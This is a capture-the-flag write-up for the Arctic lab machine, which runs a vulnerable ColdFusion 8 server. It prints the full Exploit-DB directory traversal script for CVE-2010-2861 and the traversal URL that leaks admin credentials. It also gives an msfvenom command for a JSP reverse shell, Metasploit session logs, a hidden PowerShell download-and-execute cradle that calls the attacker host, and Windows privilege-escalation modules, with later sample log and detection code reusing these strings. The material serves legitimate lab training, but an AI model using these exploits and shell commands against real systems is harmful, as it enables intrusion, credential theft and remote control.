10.10.10.11 - Arctic - LFI, Win2008 Priv Esc
ColdFusion JSP Shell Upload/MS10-092/MS16-014
Summary:
Vulnerable software: Adobe ColdFusion 8 (CFIDE, POC)
System vulnerable: 10.10.10.11:8500
Vulnerability explanation: Adobe ColdFusion Unspecified Directory Traversal Vulnerability (CVE-2010-2861)
Severity: critical
Enumeration:
Command run:
nmap 10.10.10.11 -sV -sC

Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-30 07:47 GMT
Nmap scan report for 10.10.10.11
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Directories Enumeration:
Adobe ColdFusion Version 8 administrative panel at http://10.10.10.11:8500/CFIDE/administrator/.
Details of the Adobe ColdFusion directory traversal exploit, 14641.py from Exploit-DB:
└──╼ $cat /usr/share/exploitdb/exploits/multiple/remote/14641.py
# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"


#!/usr/bin/python

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

# leo 13.08.2010

# Python 2 script (print statements, byte-string sockets).
import sys
import socket
import re

# in case some directories are blocked: every page that accepts the locale parameter
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")

# raw POST template; the file path is wrapped in null bytes (%00) in the locale value
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

locale=%%00%s%%00a"""

def main():
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return

    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]

    for f in filenames:
        print "------------------------------"
        print "trying", f

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        # Content-Length = len("locale=%00") + len(path) + len("%00a") = len(path) + 14
        s.send(post % (f, host, len(path) + 14, path))

        # read the whole response until the server closes the connection
        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s

        # the included file's contents are reflected inside the page <title>
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print m.groups(0)[0]
            print "------------------------------"

if __name__ == '__main__':
    main()
We use the LFI vulnerability at http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en to retrieve the credentials:
Thanks to the LFI vulnerability we managed to extract the username and hashed password for the login panel:
Password hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 is happyday.
Once logged in, locate Scheduled Tasks and add a task with the following file path:
C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
Shell built with:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > shell.jsp
Upon execution of http://10.10.10.11:8500/CFIDE/shell.jsp, we get a reverse shell:
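As an added defensive example (not part of the original writeup), the following Python scans constructed web-server access-log lines for the two request patterns this box involves: the CVE-2010-2861 locale traversal against /CFIDE/ and a .jsp fetched from the CFIDE tree. The sample log lines, the tag names and the combined-log regex are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format). The first four mimic the
# traffic this writeup generates; the last two are benign requests for comparison.
SAMPLE_LOG = """\
10.10.14.20 - - [30/Jan/2019:07:50:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 3113
10.10.14.20 - - [30/Jan/2019:07:50:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=%2e%2e%2f%2e%2e%2fColdFusion8%2flib%2fpassword.properties%00en HTTP/1.1" 200 3113
10.10.14.20 - - [30/Jan/2019:07:51:09 +0000] "POST /CFIDE/administrator/enter.cfm HTTP/1.1" 200 512
10.10.14.20 - - [30/Jan/2019:08:02:44 +0000] "GET /CFIDE/shell.jsp HTTP/1.1" 200 0
192.0.2.7 - - [30/Jan/2019:08:03:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 3113
192.0.2.7 - - [30/Jan/2019:08:03:11 +0000] "GET /index.cfm HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the set of detection tags that apply to one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path).lower()
    tags = set()
    if path.startswith("/cfide/"):
        # CVE-2010-2861: ColdFusion builds a file path from `locale`, so a traversal
        # sequence, a null byte (%00) or password.properties in it is never legitimate.
        # parse_qs decodes once; unquote again so double-encoded values are caught too.
        for value in parse_qs(parts.query).get("locale", []):
            decoded = unquote(value).lower()
            if "../" in decoded or "..\\" in decoded or "\x00" in decoded \
                    or "password.properties" in decoded:
                tags.add("cf_locale_traversal")
        # CFIDE ships .cfm/.js/.css, not JSP: a .jsp served from it is a dropped web shell.
        if path.endswith(".jsp"):
            tags.add("cf_jsp_in_cfide")
    # Note: the POST variant in 14641.py sends `locale` in the request body, which an
    # access log does not record; catching it needs request-body logging or a WAF.
    return tags

def scan(log_text):
    """Return (ip, target, tags) for every flagged line in log_text."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("target"), sorted(tags)))
    return hits
```

Running scan(SAMPLE_LOG) flags the two traversal requests and the shell.jsp fetch from 10.10.14.20 and nothing from the benign client.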
User flag:
C:\Users\tolis\Desktop>more user.txt
more user.txt
02650d3a69a70780c302e146a6cb96f3
Alternatively, we can catch our reverse shell with Metasploit's multi/handler:
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.20:4444
msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                     Payload opts
  --  ----                    -------                     ------------
  0   Exploit: multi/handler  java/jsp_shell_reverse_tcp  tcp://10.10.14.20:4444

msf5 exploit(multi/handler) > [*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.11:49483) at 2019-01-31 02:22:25 +0000
Our current session is a plain command shell rather than Meterpreter; we can upgrade it with the web_delivery module:
msf5 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     4455             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PSH


msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.20:4455
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/YVCJiGqyEy7pQbC
[*] Local IP: http://10.8.234.17:8080/YVCJiGqyEy7pQbC
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://10.10.14.20:8080/YVCJiGqyEy7pQbC');
[*] 10.10.10.11 web_delivery - Delivering Payload
[*] Sending stage (206403 bytes) to 10.10.10.11
[*] Meterpreter session 2 opened (10.10.14.20:4455 -> 10.10.10.11:49582) at 2019-01-31 02:35:36 +0000

msf5 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                               Connection
  --  ----  ----                     -----------                                                                               ----------
  1         shell java/linux         Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation...          10.10.14.20:4444 -> 10.10.10.11:49560 (10.10.10.11)
  2         meterpreter x64/windows  ARCTIC\tolis @ ARCTIC
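The PowerShell one-liner that web_delivery prints is a standard download cradle, and the process-creation log (Sysmon Event ID 1 or Security 4688) is where a defender sees it. As an added example (not the writeup's or Metasploit's code), this Python decodes an -EncodedCommand variant and scores constructed command lines against a few indicators; the indicator set, the threshold of three and the sample lines are assumptions.

```python
import base64
import re

# Constructed sample process-creation command lines, as a Sysmon Event ID 1 or
# Security 4688 collector would record them. The first is the web_delivery stager
# from this writeup; the second is the same cradle passed as -EncodedCommand; the
# last two are benign administrative uses of PowerShell for comparison.
CRADLE = ("$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();"
          "$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
          "IEX $n.downloadstring('http://10.10.14.20:8080/YVCJiGqyEy7pQbC');")
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c " + CRADLE,
    "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED,
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\nightly-backup.ps1",
    "powershell.exe -Command Get-Service | Where-Object Status -eq Running",
]

# Each indicator is weak on its own; the cradle is flagged when several co-occur.
INDICATORS = {
    "no_profile": re.compile(r"(?i)(^|\s)-no?p(rofile)?(\s|$)"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "invoke_expression": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "web_download": re.compile(r"(?i)net\.webclient|downloadstring|downloadfile|invoke-webrequest"),
    "remote_url": re.compile(r"(?i)https?://[^\s'\"]+"),
}

def decode_encoded_command(cmdline):
    """If the line uses -e/-enc/-EncodedCommand, return it with the UTF-16LE base64
    payload decoded in place so the indicators can see the real script."""
    m = re.search(r"(?i)-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start()] + " -c " + decoded

def analyze(cmdline):
    """Return the sorted names of the indicators matched, after decoding -enc payloads."""
    effective = decode_encoded_command(cmdline)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(effective))

def is_download_cradle(cmdline, threshold=3):
    """Flag when at least `threshold` indicators co-occur (the cut-off is an assumption)."""
    return len(analyze(cmdline)) >= threshold
```

Both cradle variants match all five indicators after decoding, while the two administrative invocations match none.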
Privilege Escalation:
We try the first exploit on the list, and ms10_092_schelevator works beautifully on 10.10.10.11.
Note to self: research how the recent CVE-2018-8440 can be used to exploit this and other versions of Windows.
Alternatively use:
ms16_014_wmi_recv_notif
Both exploits provide administrative access to this Windows 2008 machine.